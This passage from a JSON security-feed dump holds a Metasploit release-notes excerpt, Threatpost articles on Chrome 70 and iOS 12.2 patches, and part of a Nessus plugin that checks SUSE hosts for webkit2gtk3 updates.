syntax](<https://github.com/rapid7/metasploit-framework/pull/14258>) by [h00die](<https://github.com/h00die>) adds documentation and code quality changes for multiple modules. As always docs improvement are greatly appreciated!\n * [Add tab completion for `run` command](<https://github.com/rapid7/metasploit-framework/pull/14240>) by [cgranleese-r7](<https://github.com/cgranleese-r7>) adds tab completion for specifying inline options when using the `run` command. For example, within Metasploit's console typing `run` and then hitting the tab key twice will now show all available option names. 
Incomplete option names and values can also be suggested, for example `run LHOST=` and then hitting the tab key twice will show all available LHOST values.\n * [CVE-2019-1458 chrome sandbox escape](<https://github.com/rapid7/metasploit-framework/pull/13817>) by [timwr](<https://github.com/timwr>) adds support for exploiting [CVE-2019-1458](<https://attackerkb.com/topics/2i67dR7P4e/cve-2019-1458?referrer=wrapup>), aka WizardOpium, as both a standalone LPE module, and as a sandbox escape option for the `exploit/multi/browser/chrome_object_create.rb` module that exploits [CVE-2018-17463](<https://attackerkb.com/topics/fgJVNLkV6f/cve-2018-17463?referrer=wrapup>) in Chrome, thereby allowing users to both elevate their privileges on affected versions of Windows, as well as potentially execute a full end to end attack chain to go from a malicious web page to SYSTEM on systems running vulnerable versions of Chrome and Windows.\n * [Parameterize args to popen3()](<https://github.com/rapid7/metasploit-framework/pull/14288>) by [Justin Steven](<https://github.com/justinsteven>) improves commands executed during `apk` generation commands to be more explicit with options.\n * [More improved doc and syntax](<https://github.com/rapid7/metasploit-framework/pull/14258>) by [h00die](<https://github.com/h00die>) adds documentation and code quality changes for multiple modules. 
As always, docs improvements are greatly appreciated!\n\n## Bugs fixed\n\n * [MS17-010 improvements for SMB1 clients](<https://github.com/rapid7/metasploit-framework/pull/14290>) by [Spencer McIntyre](<https://github.com/zeroSteiner>) fixes an issue with the exploit/windows/smb/ms17_010_eternalblue module that was preventing sessions from being obtained successfully.\n * [Fix missing TLV migration from strings -> ints](<https://github.com/rapid7/metasploit-payloads/pull/441>) by [Justin Steven](<https://github.com/justinsteven>) converts a missed TLV conversion for COMMAND_ID_CORE_CHANNEL_CLOSE for PHP payloads.\n * [Meterpreter endless loop](<https://github.com/rapid7/metasploit-payloads/pull/439>) by [vixfwis](<https://github.com/vixfwis>), ensured that Meterpreter can properly handle SOCKET_ERROR on recv.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` and you can get more details on the changes since the last blog post from GitHub:\n\n * [Pull Requests 6.0.11...6.0.12](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222020-10-13T14%3A57%3A09-05%3A00..2020-10-22T09%3A00%3A02-05%3A00%22>)\n * [Full diff 6.0.11...6.0.12](<https://github.com/rapid7/metasploit-framework/compare/6.0.11...6.0.12>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. 
To install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the [binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {}, "published": "2020-10-23T18:56:55", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-17463", "CVE-2019-1458", "CVE-2019-18935", "CVE-2020-16875", "CVE-2020-16952"], "modified": "2020-10-23T18:56:55", "id": "RAPID7BLOG:E8EB68630D38C60B7DE4AF696474210D", "href": "https://blog.rapid7.com/2020/10/23/metasploit-wrap-up-84/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2019-05-30T05:50:38", "description": "Google has lifted the curtain on its latest version of Chrome, which the tech giant has pledged touts more data privacy features, as well as fixes for high-priority vulnerabilities.\n\nThe release comes after Google had promised updates in Chrome 70 to \u201cbetter communicate our changes and offer more control over the experience.\u201d\n\nChrome 70 for Windows, Mac and Linux will roll out over the coming days and weeks, Google said in a Tuesday [posting](<https://chromereleases.googleblog.com/2018/10/stable-channel-update-for-desktop.html>).\n\n## New Privacy Feature\n\nMost notably, Chrome 70 includes a panel enabling users to have more control over how the browser behaves when they log into their Google accounts.\n\nThe pressure is on Google to prioritize privacy policies after the tech giant came under fire for a change in Chrome 69, launched [earlier in September](<https://threatpost.com/google-rolls-out-40-fixes-with-chrome-69/137210/>). 
After that release, an update to the browser\u2019s sign-in mechanism [automatically signed users into Chrome](<https://threatpost.com/googles-forced-sign-in-to-chrome-raises-privacy-red-flags/137651/>) when they signed into any other Google service.\n\nDigs at Google increased when a separate researcher also found that when he deleted the cookies.txt files in Chrome, the browser clears all cookies \u2013 except for Google cookies.\n\nBut the new control panel means that users have the option to turn off the automatic sign-in, Zach Koch, Chrome product manager, said in a [post](<https://www.blog.google/products/chrome/product-updates-based-your-feedback/>) on the matter.\n\n\u201cWhile we think sign-in consistency will help many of our users, we\u2019re adding a control that allows users to turn off linking web-based sign-in with browser-based sign-in\u2014that way users have more control over their experience,\u201d he said. \u201cFor users that disable this feature, signing into a Google website will not sign them into Chrome.\n\n## Fixed Vulnerabilities\n\nIn addition to new privacy features, Chrome 70 also [packs](<https://chromereleases.googleblog.com/2018/10/stable-channel-update-for-desktop.html>) 23 security fixes, including both \u201chigh\u201d and \u201cmedium\u201d priority bugs; as well as new security features.\n\nOf note are patches for a high-priority sandbox escape vulnerability (CVE-2018-17462) in AppCache; a high-priority remote code-execution flaw (CVE-2018-17463) in V8; a \u201chigh\u201d priority URL spoof bug (CVE-2018-17464) in Omnibox; and a \u201chigh\u201d memory corruption glitch (CVE-2018-17466) in Angle.\n\nOther bugs include a high-priority use-after-free flaw (CVE-2018-17465) in V8, and a high-priority heap buffer overflow vulnerability in Little CMS in PDFium (no CVE assigned yet).\n\nA full list of the security bugs and fixes are 
[here](<https://chromium.googlesource.com/chromium/src/+log/69.0.3497.100..70.0.3538.67?pretty=fuller&n=10000>).\n\nChrome 70 also features Web Bluetooth, which is also available in Windows 10, which allows sites to communicate with user-selected Bluetooth devices in a \u201csecure and privacy-preserving\u201d way.\n\nAnd finally, Google released support for public key credentials in Chrome 70, which enables strong authentication to websites with public key cryptography, enabling password-less authentication and/or secure second-factor authentication without SMS texts.\n\n\u201cI\u2019m pretty excited about it because it allows sites to use my fingerprint for two-factor authentication,\u201d Pete LePage, developer advocate, said in a Tuesday [post](<https://developers.google.com/web/updates/2018/10/nic70>). \u201cBut, it also adds support for additional types of security keys and better security on the web.\u201d\n", "cvss3": {}, "published": "2018-10-17T14:04:48", "type": "threatpost", "title": "On Heels of Criticism, Newly-Released Google Chrome 70 Prioritizes Privacy", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-17462", "CVE-2018-17463", "CVE-2018-17464", "CVE-2018-17465", "CVE-2018-17466"], "modified": "2018-10-17T14:04:48", "id": "THREATPOST:2EA02E029D18D4A6E2F53BF8057CCD57", "href": "https://threatpost.com/on-heels-of-criticism-newly-released-google-chrome-70-prioritizes-privacy/138368/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-03-08T12:01:16", "description": "Apple patched 51 vulnerabilities rated serious with its iOS (12.2) update. One of the most serious bugs could allow apps to secretly listen to end users.\n\nApple\u2019s iOS security updates, announced Monday during its March product announcement event, are for the iPhone 5s and later, iPad Air and later and iPod touch 6th generation. 
The phone maker also [disclosed](<https://www.us-cert.gov/ncas/current-activity/2019/03/25/Apple-Releases-Multiple-Security-Updates>) security updates across other products including iTunes, Safari, macOS, and iCloud.\n\nThe eavesdropping [iOS vulnerability](<https://support.apple.com/en-us/HT209599>) existed in ReplayKit, which allows game developers to give players the ability to easily record and share gameplay. The flaw (CVE-2019-8566) stems from an API issue that existed in the handling of microphone data and could allow a malicious application to secretly access the user\u2019s microphone. \u201cAn API issue existed in the handling of microphone data,\u201d according to Apple\u2019s update. \u201cThis issue was addressed with improved validation,\u201d it stated.\n\n## Webkit\n\nMeanwhile, 19 of the phone maker\u2019s iOS vulnerabilities were discovered in the Webkit browser engine used by Safari, Mail, App Store and other apps on macOS, iOS and Linux.\n\nThese vulnerabilities included multiple memory corruption issues, which occur when memory location contents are modified, exceeding the intention of the program constructs and potentially leading to malicious actions such as arbitrary code execution.\n\nThe iOS memory corruption issues (CVE-2019-6201, CVE-2019-8518, CVE-2019-8523, CVE-2019-8524, CVE-2019-8558, CVE-2019-8559, CVE-2019-8563, CVE-2019-8562, CVE-2019-8536, CVE-2019-8544, CVE-2019-8535) could allow bad actors to process maliciously crafted web content. That could lead to arbitrary code execution on vulnerable devices or allow an adversary to circumvent sandbox restrictions.\n\nAnother vulnerability (CVE-2019-6222) \u2014 stemming from a \u201cconsistency issue\u201d \u2014 could allow a website to access the microphone without the microphone use indicator being shown. 
This was addressed \u201cwith improved state handling,\u201d according to Apple.\n\nApple also disclosed a logic issue (CVE-2019-8551) that could lead to attackers creating maliciously crafted web content which could lead to universal cross site scripting; a cross-origin issue in the fetch API of Webkit (CVE-2019-8515) which could disclose sensitive user information; and two use after free flaws (CVE-2019-7285 and CVE-2019-8556) that could allow arbitrary code execution.\n\n## Other Bad Bugs\n\nApple also fixed an array of vulnerabilities including a bug in GeoServices, the geo-location data services feature of iOS. The flaw (CVE-2019-8553), [highlighted](<https://twitter.com/patrickwardle/status/1110283016117473281?ref_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1110283016117473281&ref_url=https%3A%2F%2Fkasperskycontenthub.com%2Fthreatpost-global%2Fwp-admin%2Fpost-new.php>) by Apple security expert Patrick Wardle, could lead to arbitrary code execution when a user clicks a malicious SMS link.\n\nhttps://twitter.com/patrickwardle/status/1110283016117473281\n\nApple also fixed two bugs (CVE-2019-8565, CVE-2019-8521) in its Feedback Assistant component (a built-in app to send feedback to Apple). The flaws could allow a malicious app to gain root privileges or overwrite arbitrary files.\n\nApple\u2019s [macOS Mojave 10.14.4](<https://support.apple.com/en-gb/HT209600>), which updates its Mac operating system, also squashes some pesky bugs. Those include a previously disclosed [Apple Keychain flaw](<https://threatpost.com/macos-zero-day-exposes-apple-keychain-passwords/141584/>) \u2013 stemming from a use after free issue. The flaw (CVE-2019-8526) impacted macOS, and could allow an attacker to extract passwords from a targeted Mac\u2019s keychain password management system. 
While the researcher who discovered the attack, Linus Henze, originally refused to disclose it, citing Apple\u2019s lack of macOS bug bounty program, he eventually submitted the exploit and Apple issued a fix.\n\nhttps://twitter.com/LinusHenze/status/1110316740888662016\n\nAlso patched were a macOS buffer overflow issue in the operating system\u2019s \u201cContacts\u201d feature which could allow a malicious application to elevate privileges and view users\u2019 contacts (CVE-2019-8511); as well as an access issue that could allow a bad actor to view users\u2019 locked notes (CVE-2019-8537).\n", "cvss3": {}, "published": "2019-03-26T13:54:14", "type": "threatpost", "title": "Apple iOS 12.2 Patches 51 Serious Flaws", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-6201", "CVE-2019-6222", "CVE-2019-7285", "CVE-2019-8511", "CVE-2019-8515", "CVE-2019-8518", "CVE-2019-8521", "CVE-2019-8523", "CVE-2019-8524", "CVE-2019-8526", "CVE-2019-8535", "CVE-2019-8536", "CVE-2019-8537", "CVE-2019-8544", "CVE-2019-8551", "CVE-2019-8553", "CVE-2019-8556", "CVE-2019-8558", "CVE-2019-8559", "CVE-2019-8562", "CVE-2019-8563", "CVE-2019-8565", "CVE-2019-8566"], "modified": "2019-03-26T13:54:14", "id": "THREATPOST:37BD8473EEF61891FD09D32105F6C9E1", "href": "https://threatpost.com/apple-ios-12-2-patches-51-serious-flaws/143162/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-08-19T12:29:24", "description": "This update for webkit2gtk3 to version 2.22.5 fixes the following issues :\n\nSecurity issues fixed :\n\nCVE-2018-4438: Fixed a logic issue which lead to memory corruption (bsc#1119554)\n\nCVE-2018-4437, CVE-2018-4441, CVE-2018-4442, CVE-2018-4443, CVE-2018-4464: Fixed multiple memory corruption issues with improved memory handling (bsc#1119553, bsc#1119555, bsc#1119556, bsc#1119557, bsc#1119558)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-01-24T00:00:00", "type": "nessus", "title": "SUSE SLED12 / SLES12 Security Update : webkit2gtk3 (SUSE-SU-2019:0146-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-4437", "CVE-2018-4438", "CVE-2018-4441", "CVE-2018-4442", "CVE-2018-4443", "CVE-2018-4464"], "modified": "2021-01-13T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:libjavascriptcoregtk-4_0", "p-cpe:/a:novell:suse_linux:libjavascriptcoregtk-4_0-18-debuginfo", "p-cpe:/a:novell:suse_linux:libwebkit2gtk-4_0", "p-cpe:/a:novell:suse_linux:libwebkit2gtk-4_0-37-debuginfo", "p-cpe:/a:novell:suse_linux:typelib-1_0-JavaScriptCore", "p-cpe:/a:novell:suse_linux:typelib-1_0-WebKit2", "p-cpe:/a:novell:suse_linux:typelib-1_0-WebKit2WebExtension", "p-cpe:/a:novell:suse_linux:webkit2gtk-4_0-injected-bundles", "p-cpe:/a:novell:suse_linux:webkit2gtk-4_0-injected-bundles-debuginfo", "p-cpe:/a:novell:suse_linux:webkit2gtk3-debugsource", "p-cpe:/a:novell:suse_linux:webkit2gtk3-devel", "cpe:/o:novell:suse_linux:12"], "id": "SUSE_SU-2019-0146-1.NASL", "href": "https://www.tenable.com/plugins/nessus/121343", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2019:0146-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(121343);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/13\");\n\n script_cve_id(\"CVE-2018-4437\", \"CVE-2018-4438\", \"CVE-2018-4441\", \"CVE-2018-4442\", \"CVE-2018-4443\", \"CVE-2018-4464\");\n\n script_name(english:\"SUSE SLED12 / SLES12 Security Update : webkit2gtk3 (SUSE-SU-2019:0146-1)\");\n script_summary(english:\"Checks rpm output for 
the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"This update for webkit2gtk3 to version 2.22.5 fixes the following\nissues :\n\nSecurity issues fixed :\n\nCVE-2018-4438: Fixed a logic issue which lead to memory corruption\n(bsc#1119554)\n\nCVE-2018-4437, CVE-2018-4441, CVE-2018-4442, CVE-2018-4443,\nCVE-2018-4464: Fixed multiple memory corruption issues with improved\nmemory handling (bsc#1119553, bsc#1119555, bsc#1119556, bsc#1119557,\nbsc#1119558)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1119553\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1119554\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1119555\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1119556\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1119557\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1119558\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4437/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4438/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4441/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 
value:\"https://www.suse.com/security/cve/CVE-2018-4442/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4443/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4464/\"\n );\n # https://www.suse.com/support/update/announcement/2019/suse-su-20190146-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?7e74bdcd\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE OpenStack Cloud 7:zypper in -t patch\nSUSE-OpenStack-Cloud-7-2019-146=1\n\nSUSE Linux Enterprise Workstation Extension 12-SP4:zypper in -t patch\nSUSE-SLE-WE-12-SP4-2019-146=1\n\nSUSE Linux Enterprise Workstation Extension 12-SP3:zypper in -t patch\nSUSE-SLE-WE-12-SP3-2019-146=1\n\nSUSE Linux Enterprise Software Development Kit 12-SP4:zypper in -t\npatch SUSE-SLE-SDK-12-SP4-2019-146=1\n\nSUSE Linux Enterprise Software Development Kit 12-SP3:zypper in -t\npatch SUSE-SLE-SDK-12-SP3-2019-146=1\n\nSUSE Linux Enterprise Server for SAP 12-SP2:zypper in -t patch\nSUSE-SLE-SAP-12-SP2-2019-146=1\n\nSUSE Linux Enterprise Server 12-SP4:zypper in -t patch\nSUSE-SLE-SERVER-12-SP4-2019-146=1\n\nSUSE Linux Enterprise Server 12-SP3:zypper in -t patch\nSUSE-SLE-SERVER-12-SP3-2019-146=1\n\nSUSE Linux Enterprise Server 12-SP2-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-SP2-2019-146=1\n\nSUSE Linux Enterprise Server 12-SP2-BCL:zypper in -t patch\nSUSE-SLE-SERVER-12-SP2-BCL-2019-146=1\n\nSUSE Linux Enterprise Desktop 12-SP4:zypper in -t patch\nSUSE-SLE-DESKTOP-12-SP4-2019-146=1\n\nSUSE Linux Enterprise Desktop 12-SP3:zypper in -t patch\nSUSE-SLE-DESKTOP-12-SP3-2019-146=1\n\nSUSE Enterprise Storage 4:zypper in -t patch SUSE-Storage-4-2019-146=1\"\n );\n 
script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libjavascriptcoregtk-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libjavascriptcoregtk-4_0-18-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libwebkit2gtk-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libwebkit2gtk-4_0-37-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:typelib-1_0-JavaScriptCore\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:typelib-1_0-WebKit2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:typelib-1_0-WebKit2WebExtension\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:webkit2gtk-4_0-injected-bundles\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:webkit2gtk-4_0-injected-bundles-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:webkit2gtk3-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:webkit2gtk3-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/04/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/01/23\");\n 
script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/01/24\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED12|SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED12 / SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(2|3|4)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP2/3/4\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED12\" && (! 
preg(pattern:\"^(3|4)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED12 SP3/4\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libjavascriptcoregtk-4_0-18-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libjavascriptcoregtk-4_0-18-debuginfo-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libwebkit2gtk-4_0-37-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libwebkit2gtk-4_0-37-debuginfo-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"typelib-1_0-JavaScriptCore-4_0-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"typelib-1_0-WebKit2-4_0-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"webkit2gtk-4_0-injected-bundles-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"webkit2gtk-4_0-injected-bundles-debuginfo-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"webkit2gtk3-debugsource-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libjavascriptcoregtk-4_0-18-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libjavascriptcoregtk-4_0-18-debuginfo-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libwebkit2gtk-4_0-37-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libwebkit2gtk-4_0-37-debuginfo-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"typelib-1_0-JavaScriptCore-4_0-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"typelib-1_0-WebKit2-4_0-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"webkit2gtk-4_0-injected-bundles-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", 
reference:\"webkit2gtk-4_0-injected-bundles-debuginfo-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"webkit2gtk3-debugsource-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libjavascriptcoregtk-4_0-18-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libjavascriptcoregtk-4_0-18-debuginfo-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libwebkit2gtk-4_0-37-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libwebkit2gtk-4_0-37-debuginfo-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"typelib-1_0-JavaScriptCore-4_0-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"typelib-1_0-WebKit2-4_0-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"typelib-1_0-WebKit2WebExtension-4_0-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"webkit2gtk-4_0-injected-bundles-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"webkit2gtk-4_0-injected-bundles-debuginfo-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"webkit2gtk3-debugsource-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"webkit2gtk3-devel-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"4\", cpu:\"x86_64\", reference:\"libjavascriptcoregtk-4_0-18-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"4\", cpu:\"x86_64\", reference:\"libjavascriptcoregtk-4_0-18-debuginfo-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"4\", cpu:\"x86_64\", reference:\"libwebkit2gtk-4_0-37-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"4\", cpu:\"x86_64\", reference:\"libwebkit2gtk-4_0-37-debuginfo-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"4\", cpu:\"x86_64\", 
reference:\"typelib-1_0-JavaScriptCore-4_0-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"4\", cpu:\"x86_64\", reference:\"typelib-1_0-WebKit2-4_0-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"4\", cpu:\"x86_64\", reference:\"webkit2gtk-4_0-injected-bundles-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"4\", cpu:\"x86_64\", reference:\"webkit2gtk-4_0-injected-bundles-debuginfo-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"4\", cpu:\"x86_64\", reference:\"webkit2gtk3-debugsource-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libjavascriptcoregtk-4_0-18-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libjavascriptcoregtk-4_0-18-debuginfo-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libwebkit2gtk-4_0-37-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libwebkit2gtk-4_0-37-debuginfo-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"typelib-1_0-JavaScriptCore-4_0-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"typelib-1_0-WebKit2-4_0-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", 